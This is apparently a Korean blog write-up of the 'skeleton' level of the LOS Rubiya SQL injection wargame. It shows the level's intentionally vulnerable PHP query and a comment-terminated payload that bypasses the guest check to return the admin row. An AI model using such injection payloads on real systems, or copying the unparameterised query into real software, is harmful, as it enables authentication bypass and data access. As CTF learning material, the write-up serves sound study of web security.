[LOS Rubiya] skeleton
2020. 2. 27. 18:03ㆍWargame & CTF/LOS Rubiya
Analysis
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id'] == 'admin') solve("skeleton");
highlight_file(__FILE__);
?>
select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0
를 해서 id값이 admin이 나와야 한다.
pw에 id='guest'값을 false로 만들어주고 id='admin'을 뽑는 sql을 인젝하면 된다.
뒤에 and 1=0은 무조건 거짓값을 만드므로 # (%23)을 넣어서 주석처리를 하면 된다.
Exploit
?pw=' and 1=0 or id='admin'#
'Wargame & CTF > LOS Rubiya' 카테고리의 다른 글
[LOS Rubiya] vampire (0) | 2020.02.27 |
---|---|
[LOS Rubiya] troll (0) | 2020.02.27 |
LOS Rubiya orge (0) | 2019.08.05 |
LOS Rubiya darkelf (0) | 2019.08.05 |
LOS Rubiya wolfman (0) | 2019.08.05 |